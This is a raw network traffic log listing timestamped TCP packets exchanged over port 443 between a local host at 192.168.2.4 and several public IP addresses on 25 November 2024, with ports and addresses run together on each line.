                                                                                                                          Nov 25, 2024 16:42:31.331918955 CET44349749104.17.24.14192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:31.331986904 CET49749443192.168.2.4104.17.24.14
                                                                                                                          Nov 25, 2024 16:42:31.332015038 CET44349749104.17.24.14192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:31.367700100 CET44349749104.17.24.14192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:31.367767096 CET49749443192.168.2.4104.17.24.14
                                                                                                                          Nov 25, 2024 16:42:31.367796898 CET44349749104.17.24.14192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:31.368017912 CET44349749104.17.24.14192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:31.368073940 CET49749443192.168.2.4104.17.24.14
                                                                                                                          Nov 25, 2024 16:42:31.371752977 CET49749443192.168.2.4104.17.24.14
                                                                                                                          Nov 25, 2024 16:42:31.371773005 CET44349749104.17.24.14192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:31.373550892 CET44349750151.101.2.137192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:31.373589993 CET44349750151.101.2.137192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:31.373632908 CET44349750151.101.2.137192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:31.373651981 CET44349750151.101.2.137192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:31.377387047 CET49750443192.168.2.4151.101.2.137
                                                                                                                          Nov 25, 2024 16:42:31.377409935 CET44349750151.101.2.137192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:31.377454996 CET49750443192.168.2.4151.101.2.137
                                                                                                                          Nov 25, 2024 16:42:31.415944099 CET44349750151.101.2.137192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:31.415992975 CET44349750151.101.2.137192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:31.416013002 CET49750443192.168.2.4151.101.2.137
                                                                                                                          Nov 25, 2024 16:42:31.416027069 CET44349750151.101.2.137192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:31.416048050 CET49750443192.168.2.4151.101.2.137
                                                                                                                          Nov 25, 2024 16:42:31.416066885 CET49750443192.168.2.4151.101.2.137
                                                                                                                          Nov 25, 2024 16:42:31.537280083 CET44349750151.101.2.137192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:31.537328005 CET44349750151.101.2.137192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:31.537420988 CET49750443192.168.2.4151.101.2.137
                                                                                                                          Nov 25, 2024 16:42:31.537420988 CET49750443192.168.2.4151.101.2.137
                                                                                                                          Nov 25, 2024 16:42:31.537434101 CET44349750151.101.2.137192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:31.537563086 CET49750443192.168.2.4151.101.2.137
                                                                                                                          Nov 25, 2024 16:42:31.567534924 CET44349750151.101.2.137192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:31.567593098 CET44349750151.101.2.137192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:31.567651033 CET49750443192.168.2.4151.101.2.137
                                                                                                                          Nov 25, 2024 16:42:31.567658901 CET44349750151.101.2.137192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:31.567701101 CET49750443192.168.2.4151.101.2.137
                                                                                                                          Nov 25, 2024 16:42:31.567714930 CET49750443192.168.2.4151.101.2.137
                                                                                                                          Nov 25, 2024 16:42:31.579521894 CET44349750151.101.2.137192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:31.579641104 CET49750443192.168.2.4151.101.2.137
                                                                                                                          Nov 25, 2024 16:42:31.579648018 CET44349750151.101.2.137192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:31.579690933 CET44349750151.101.2.137192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:31.579741955 CET49750443192.168.2.4151.101.2.137
                                                                                                                          Nov 25, 2024 16:42:31.579912901 CET49750443192.168.2.4151.101.2.137
                                                                                                                          Nov 25, 2024 16:42:31.579914093 CET49750443192.168.2.4151.101.2.137
                                                                                                                          Nov 25, 2024 16:42:31.579926014 CET44349750151.101.2.137192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:31.579976082 CET49750443192.168.2.4151.101.2.137
                                                                                                                          Nov 25, 2024 16:42:31.673629045 CET49753443192.168.2.420.109.210.53
                                                                                                                          Nov 25, 2024 16:42:31.673665047 CET4434975320.109.210.53192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:31.673743963 CET49753443192.168.2.420.109.210.53
                                                                                                                          Nov 25, 2024 16:42:31.674968004 CET49753443192.168.2.420.109.210.53
                                                                                                                          Nov 25, 2024 16:42:31.674987078 CET4434975320.109.210.53192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:32.337047100 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:32.344347000 CET49751443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:32.344382048 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:32.345732927 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:32.345803976 CET49751443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:32.352251053 CET49751443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:32.352315903 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:32.359386921 CET49751443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:32.359396935 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:32.373334885 CET44349752104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:32.403306007 CET49751443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:32.426563978 CET49752443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:32.506458044 CET49752443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:32.506484032 CET44349752104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:32.508059025 CET44349752104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:32.508074999 CET44349752104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:32.508131027 CET49752443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:32.509109020 CET49752443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:32.509212017 CET44349752104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:32.509413958 CET49752443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:32.509432077 CET44349752104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:32.559782982 CET49752443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:32.870915890 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:32.870950937 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:32.870975018 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:32.870996952 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:32.871021986 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:32.871021032 CET49751443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:32.871040106 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:32.871059895 CET49751443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:32.871083021 CET49751443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:32.871087074 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:32.879354000 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:32.879400969 CET49751443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:32.879410028 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:32.887777090 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:32.887830973 CET49751443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:32.887839079 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:32.934889078 CET49751443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:32.934897900 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:32.980901957 CET49751443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:32.996082067 CET44349752104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:32.996170044 CET44349752104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:32.996207952 CET44349752104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:32.996262074 CET49752443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:32.996288061 CET44349752104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:32.996433020 CET49752443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:33.001054049 CET44349752104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.009480000 CET44349752104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.009942055 CET49752443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:33.009958029 CET44349752104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.017955065 CET44349752104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.019109964 CET49752443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:33.019124985 CET44349752104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.040086985 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:33.040132999 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.040267944 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:33.040493011 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:33.040524960 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.071702003 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.074364901 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.074455976 CET49751443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:33.074470997 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.074506044 CET49752443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:33.090895891 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.090945005 CET49751443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:33.090954065 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.099255085 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.099308968 CET49751443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:33.099320889 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.107642889 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.107670069 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.107693911 CET49751443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:33.107702971 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.107760906 CET49751443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:33.115952969 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.120369911 CET44349752104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.124413013 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.124525070 CET49751443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:33.124537945 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.124583006 CET44349752104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.124799013 CET49752443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:33.124818087 CET44349752104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.132673025 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.132723093 CET49751443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:33.132735968 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.141036987 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.141093016 CET49751443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:33.141100883 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.149425983 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.149579048 CET49751443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:33.149586916 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.175571918 CET49752443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:33.197345972 CET44349752104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.198585033 CET49751443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:33.198596001 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.201503992 CET44349752104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.201582909 CET49752443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:33.201597929 CET44349752104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.209053040 CET44349752104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.209137917 CET49752443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:33.209151983 CET44349752104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.216801882 CET44349752104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.216847897 CET49752443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:33.216861963 CET44349752104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.224442959 CET44349752104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.224505901 CET44349752104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.224520922 CET49752443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:33.224560022 CET49752443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:33.224821091 CET49752443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:33.224839926 CET44349752104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.232306957 CET49755443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:33.232340097 CET44349755104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.232403040 CET49755443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:33.232731104 CET49755443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:33.232745886 CET44349755104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.245501041 CET49751443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:33.273546934 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.275963068 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.276010990 CET49751443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:33.276026011 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.280335903 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.280383110 CET49751443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:33.280390978 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.280400038 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.280447960 CET49751443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:33.280572891 CET49751443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:33.280585051 CET44349751104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.409991980 CET4434975320.109.210.53192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.410072088 CET49753443192.168.2.420.109.210.53
                                                                                                                          Nov 25, 2024 16:42:33.413599968 CET49753443192.168.2.420.109.210.53
                                                                                                                          Nov 25, 2024 16:42:33.413610935 CET4434975320.109.210.53192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.413937092 CET4434975320.109.210.53192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.466418982 CET49753443192.168.2.420.109.210.53
                                                                                                                          Nov 25, 2024 16:42:33.901860952 CET44349739142.250.181.68192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.901998997 CET44349739142.250.181.68192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:33.902072906 CET49739443192.168.2.4142.250.181.68
                                                                                                                          Nov 25, 2024 16:42:34.332921028 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:34.333209991 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:34.333240032 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:34.333703995 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:34.334028959 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:34.334112883 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:34.334198952 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:34.379332066 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:34.512989044 CET44349755104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:34.513276100 CET49755443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:34.513300896 CET44349755104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:34.513776064 CET44349755104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:34.514152050 CET49755443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:34.514229059 CET44349755104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:34.514415979 CET49755443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:34.555351019 CET44349755104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:34.725356102 CET49739443192.168.2.4142.250.181.68
                                                                                                                          Nov 25, 2024 16:42:34.725378036 CET44349739142.250.181.68192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:34.796314955 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:34.796431065 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:34.796515942 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:34.796581030 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:34.796612024 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:34.796674013 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:34.796684980 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:34.796713114 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:34.797164917 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:34.806176901 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:34.816549063 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:34.816620111 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:34.816622019 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:34.816647053 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:34.817014933 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:34.827233076 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:34.874213934 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:34.874228954 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:34.919707060 CET49753443192.168.2.420.109.210.53
                                                                                                                          Nov 25, 2024 16:42:34.920977116 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:34.963356972 CET4434975320.109.210.53192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:34.987529993 CET44349755104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:34.987693071 CET44349755104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:34.988538027 CET49755443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:34.988713980 CET49755443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:34.988727093 CET44349755104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:34.991913080 CET49758443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:34.991944075 CET44349758104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:34.992007017 CET49758443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:34.992230892 CET49758443192.168.2.4104.18.95.41
                                                                                                                          Nov 25, 2024 16:42:34.992244959 CET44349758104.18.95.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.010884047 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.013294935 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.013360977 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.013381958 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.022185087 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.022248983 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.022262096 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.037870884 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.037945986 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.037959099 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.046736002 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.046969891 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.047044039 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.047056913 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.047108889 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.055599928 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.062726021 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.062810898 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.062889099 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.062903881 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.062957048 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.069783926 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.076833010 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.076936960 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.076951027 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.084021091 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.084086895 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.084099054 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.090954065 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.091027975 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.091041088 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.105053902 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.105149031 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.105211020 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.105225086 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.105271101 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.131005049 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.184676886 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.212383986 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.215555906 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.215640068 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.215656996 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.221865892 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.221925020 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.221940041 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.234139919 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.234205008 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.234217882 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.234271049 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.246603012 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.246623039 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.246678114 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.256026983 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.256047964 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.256088018 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.256103992 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.256133080 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.265847921 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.265911102 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.265923977 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.265989065 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.269047976 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.269068956 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.269112110 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.274841070 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.274902105 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.274914980 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.274971008 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.280802011 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.280874968 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.286787987 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.286859989 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.289905071 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.289969921 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.295960903 CET44349754104.18.94.41192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:35.296024084 CET49754443192.168.2.4104.18.94.41
                                                                                                                          Nov 25, 2024 16:42:35.299096107 CET44349754104.18.94.41192.168.2.4
